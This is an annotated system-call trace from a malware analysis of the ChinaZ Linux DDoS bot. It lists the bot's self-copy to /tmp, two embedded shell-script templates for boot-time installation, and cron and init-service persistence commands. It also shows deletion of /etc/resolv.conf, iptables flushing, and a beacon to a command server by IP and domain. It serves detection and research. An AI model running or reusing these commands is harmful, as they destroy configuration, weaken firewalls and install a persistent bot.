- # MalwareMustDie! ChinaZ Initial execution calls &
- # Networking commands
- /////////////////////////
- //
- // COMMAND EXECUTION
- //
- /////////////////////////
- // launch: the sample is executed from the analyst's working directory (./SAMPLE)
- execve("./SAMPLE"["./SAMPLE"] )
- // copies itself to /tmp as a hidden dot-file, "/tmp/.chinaz{<number>}" (the number looks like a Unix timestamp; note it differs between this open() and the chkconfig calls below, so those lines may come from separate runs). The copy is created with mode 0777, i.e. world-writable and executable.
- uname()
- chdir("/tmp")
- readlink("/proc/self/exe", "/home/YOU/test/SAMPLE", 256)
- open("/home/YOU/test/SAMPLE", O_RDONLY)
- open("/tmp/.chinaz{1434745889", O_WRONLY|O_CREAT, 0777)
- read(0, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
- write(1, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
- // installer: two embedded shell-script templates (format strings, the %s are filled in at runtime). The first is a SysV/LSB init script (chkconfig: 12345 90 90, Default-Start 1 2 3 4 5) whose start) branch runs a %s command, presumably the dropped copy; the second brings up every interface listed in /proc/net/dev, copies /lib/udev/udev to /lib/udev/debug and executes it.
- #!/bin/sh\n# chkconfig: 12345 90 90\n# description: %s\n### BEGIN INIT INFO\n# Provides:\t\t%s\n# Required-Start:\t\n# Required-Stop:\t\n# Default-Start:\t1 2 3 4 5\n# Default-Stop:\t\t\n# Short-Description:\t%s\n### END INIT INFO\ncase $1 in\nstart)\n\t%s\n\t;;\nstop)\n\t;;\n*)\n\t%s\n\t;;\nesac\n
- #!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done\ncp /lib/udev/udev /lib/udev/debug\n/lib/udev/debug\n
- // persistence: registers the dropped /tmp copy as a boot service, trying chkconfig --add and update-rc.d ... defaults under a hardcoded list of directories (the unusual /usr/local/games and /usr/games entries are a useful detection artifact).
- execve("/usr/local/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/local/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/local/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/local/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/local/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/usr/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- // de-registers any boot service named after the original sample (update-rc.d SAMPLE remove / chkconfig --del SAMPLE); note the first update-rc.d remove calls already appear above this comment, and no unlink() of the original file is visible in this excerpt.
- execve("/usr/local/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/usr/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/usr/local/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/usr/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/usr/local/games/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/usr/games/chkconfig"["chkconfig""--del""SAMPLE"] )
- // cron persistence (needs root, since /etc/crontab is edited): strips any existing /etc/cron.hourly/cron.sh entry from /etc/crontab and appends a job running it as root every 3 minutes; the contents of cron.sh are not shown here.
- execve("/bin/sh"["sh""-c""sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"...] )
- execve("/bin/sed"["sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"] )
- // deletes /etc/resolv.conf outright (rm -rf), wiping the host's DNS resolver configuration. Oddly, the NETWORKING section below still reads a nameserver from /etc/resolv.conf — presumably captured in a separate run, or the file was recreated; TODO confirm.
- execve("/bin/sh"["sh""-c""rm -rf /etc/resolv.conf"] )
- execve("/bin/rm"["rm""-rf""/etc/resolv.conf"] )
- // drops a marker file: touch /home/YOU/ConfigDatecz in the user's home directory (an empty file named ConfigDatecz is a handy host IOC for this sample).
- execve("/bin/sh"["sh""-c""touch /home/YOU/ConfigDatecz"] )
- execve("/usr/bin/touch"["touch""/home/YOU/ConfigDatecz"] )
- // firewall tampering: runs whoami (presumably a root check), flushes every iptables rule, then adds OUTPUT rules dropping outbound TCP to a series of destination ports (the %d placeholders are filled at runtime; the actual port list is not visible in this excerpt).
- execve("/bin/sh"["sh""-c""whoami"] )
- execve("/bin/sh"["sh""-c""iptables --flush"]
- execve("/usr/bin/whoami"["whoami"] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...]
- execve("/bin/sh"["sh""-c""whoami"] )
- execve("/usr/bin/whoami"["whoami"] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- (...)
- /////////////////////////
- //
- // NETWORKING
- //
- /////////////////////////
- // enumerates the local interfaces and their IPv4 addresses (lo, eth0, ...) through a UDP socket ioctl; the addresses are redacted here as a,b,c,d / w,x,y,z. The original note ties this to the iptables step, which the trace alone does not confirm.
- socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)
- {{"lo", {AF_INET, inet_addr("127.0.0.1")}},
- {"eth0", {AF_INET, inet_addr("a,b,c,d")}},
- {"ethn", {AF_INET, inet_addr("w,x,y,z")}}}})
- // C2 resolution: reads the nameserver from /etc/resolv.conf and sends a DNS A-record query (type 1, class IN) for www.avttx.cn over UDP/53.
- socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
- open("/etc/resolv.conf", O_RDONLY)
- read(4, "nameserver DNS-ADDRESS\nnameser"..., 4096)
- socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP)
- connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
- send(4, "\5\237\1\0\0\1\0\0\0\0\0\0\3www\5avttx\2cn\0\0\1\0\1", 30, MSG_NOSIGNAL)
- recvfrom(4, "\5\237\201\200\0\1\0\1\0\2\0\6\3www\5avttx\2cn\0\0\1\0\1\300\f"
- {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
- // C2 beacon: TCP connection to 121.42.159.37 port 60000, followed by a 372-byte message beginning with the literal "ThisIsNotLinux"; the original note says hostname/uname data follows, but the trace is truncated here. The -1 file descriptor in send() is odd — probably an artifact of how the trace was captured; TODO confirm.
- connect(3, {sa_family=AF_INET, sin_port=htons(60000), sin_addr=inet_addr("121.42.159.37")}
- send(-1, "ThisIsNotLinux\0\0\0\0\0\0\0\0\0\0\0\0"..., 372, 0)
- // PS: Upon a successful connection the Config.ini file will be saved,
- and the system will be rebooted and then operate as a DDoS bot (neither step is shown in this excerpt).
- # end